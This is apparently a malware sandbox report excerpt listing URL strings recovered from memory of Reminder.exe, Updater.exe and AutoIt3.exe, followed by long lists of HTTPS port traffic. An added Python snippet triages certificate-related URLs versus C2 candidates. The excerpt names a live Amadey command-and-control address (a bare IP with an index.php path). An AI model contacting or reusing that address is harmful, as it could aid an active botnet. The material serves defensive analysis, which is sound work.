Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: Updater.exe, 0000001C.00000000.1722434360.00000000007A5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000000.2362895220.0000000000D45000.00000002.00000001.01000000.0000000D.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jrsoftware.org/
Source: Reminder.exe, 00000000.00000000.1678698708.0000000000861000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jrsoftware.org0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: Reminder.exe, 00000000.00000003.1680434117.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Reminder.exe, 00000000.00000003.1680920376.000000007F2BB000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000000.1682457089.0000000000A41000.00000020.00000001.01000000.00000004.sdmp, Reminder.tmp, 00000003.00000000.1688593494.0000000000F1D000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.innosetup.com/
Source: Reminder.exe, 00000000.00000003.1680434117.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, Reminder.exe, 00000000.00000003.1680920376.000000007F2BB000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000000.1682457089.0000000000A41000.00000020.00000001.01000000.00000004.sdmp, Reminder.tmp, 00000003.00000000.1688593494.0000000000F1D000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.remobjects.com/ps
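Most of the URL strings listed above for Reminder.tmp, Updater.exe and AutoIt3.exe are not C2: CRL distribution points, OCSP/AIA pointers, CPS links and repository URLs of this shape are carried inside the X.509 certificates that signed binaries embed, and the odd trailing characters ("0q", "0#", "04", "0V") are the DER tag and length bytes of the next element in the extension, not part of the URL. Only the bare-IP URL under 152.89.198.124 is a C2 indicator here. The Python below is an added example written for this page, not code from the report or from Amadey; its input list is constructed from a subset of the strings shown above, and the host and path patterns it uses for PKI endpoints are a heuristic, not an authoritative list.

```python
"""Sort URL strings recovered from memory into PKI noise and C2 candidates.

Added example for this page, not code from the report or from Amadey.
Signed binaries carry their certificate chain, and each certificate's CRL,
OCSP/AIA and CPS pointers surface as URL strings when memory is scanned;
the byte or two after such a URL is DER debris, not part of the URL.
The input list is constructed from strings shown in the report.
"""
import ipaddress
import re
from typing import Dict, List
from urllib.parse import urlsplit

MEMORY_STRINGS = [
    "http://152.89.198.124/8bdDsv3dk2FF/index.php",
    "http://152.89.198.124/8bdDsv3dk2FF/index.phped",
    "http://crl.certum.pl/cscasha2.crl0q",
    "http://crl.globalsign.com/root-r3.crl0c",
    "http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#",
    "http://ocsp.sectigo.com0",
    "http://ocsp2.globalsign.com/gscodesignsha2g30V",
    "http://repository.certum.pl/ctnca.cer09",
    "https://www.certum.pl/CPS0",
    "https://jrsoftware.org/",
]

# DER bytes that trail a URL inside an X.509 extension: a '0' (SEQUENCE tag,
# 0x30) plus at most one length byte, directly after a recognisable ending.
# Endings not in this list are left untouched rather than guessed at.
DER_TRAILER_RE = re.compile(
    r"(\.(?:crl|crt|cer)|/CPS|/repository/|\.(?:com|pl|net))0[^/]?$", re.I)
# Heuristic host prefixes and path endings used by CA revocation/policy endpoints
PKI_HOST_RE = re.compile(r"^(crl|crt|ocsp\d*|repository|secure)\.", re.I)
PKI_PATH_RE = re.compile(r"\.(crl|crt|cer)$|/CPS$|/repository/?$", re.I)


def strip_der_trailer(url: str) -> str:
    """Remove DER debris after the URL; leaves unrecognised endings alone."""
    return DER_TRAILER_RE.sub(r"\1", url)


def classify(url: str) -> str:
    """'c2-candidate' (bare-IP host), 'pki-infrastructure', or 'other'."""
    parts = urlsplit(strip_der_trailer(url))
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        return "c2-candidate"
    except ValueError:
        pass
    if PKI_HOST_RE.match(host) or PKI_PATH_RE.search(parts.path):
        return "pki-infrastructure"
    return "other"


def triage(strings: List[str]) -> Dict[str, List[str]]:
    """Bucket cleaned, de-duplicated URLs by category, preserving order."""
    buckets: Dict[str, List[str]] = {
        "c2-candidate": [], "pki-infrastructure": [], "other": []}
    seen = set()
    for s in strings:
        url = strip_der_trailer(s)
        if url in seen:
            continue
        seen.add(url)
        buckets[classify(url)].append(url)
    return buckets


if __name__ == "__main__":
    for category, urls in triage(MEMORY_STRINGS).items():
        print(category)
        for u in urls:
            print("   ", u)
```

Strings that survive with junk after a real path (index.phped, index.phpp above) are memory read-over, so the bare-IP bucket should be de-duplicated by host and path prefix before it is turned into indicators; the hostname-based rule keeps legitimate vendor sites such as jrsoftware.org out of both buckets.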
Source: unknown Network traffic detected: HTTP traffic on port 57886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57922
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57924
Source: unknown Network traffic detected: HTTP traffic on port 57754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57921
Source: unknown Network traffic detected: HTTP traffic on port 57811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57815
Source: unknown Network traffic detected: HTTP traffic on port 57960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57814
Source: unknown Network traffic detected: HTTP traffic on port 57925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57935
Source: unknown Network traffic detected: HTTP traffic on port 57868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57931
Source: unknown Network traffic detected: HTTP traffic on port 57731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57948
Source: unknown Network traffic detected: HTTP traffic on port 57959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57825
Source: unknown Network traffic detected: HTTP traffic on port 57926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57820
Source: unknown Network traffic detected: HTTP traffic on port 57903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57950
Source: unknown Network traffic detected: HTTP traffic on port 57730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57714
Source: unknown Network traffic detected: HTTP traffic on port 57948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57955
Source: unknown Network traffic detected: HTTP traffic on port 57719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57958
Source: unknown Network traffic detected: HTTP traffic on port 57996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57952
Source: unknown Network traffic detected: HTTP traffic on port 57778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57951
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57961
Source: unknown Network traffic detected: HTTP traffic on port 57810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57960
Source: unknown Network traffic detected: HTTP traffic on port 57880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57908
Source: unknown Network traffic detected: HTTP traffic on port 57800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57905
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57904
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57906
Source: unknown Network traffic detected: HTTP traffic on port 57949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57901
Source: unknown Network traffic detected: HTTP traffic on port 57961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57903
Source: unknown Network traffic detected: HTTP traffic on port 57718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57902
Source: unknown Network traffic detected: HTTP traffic on port 57779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57916
Source: unknown Network traffic detected: HTTP traffic on port 57927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57915
Source: unknown Network traffic detected: HTTP traffic on port 57845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57917
Source: unknown Network traffic detected: HTTP traffic on port 57983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57910
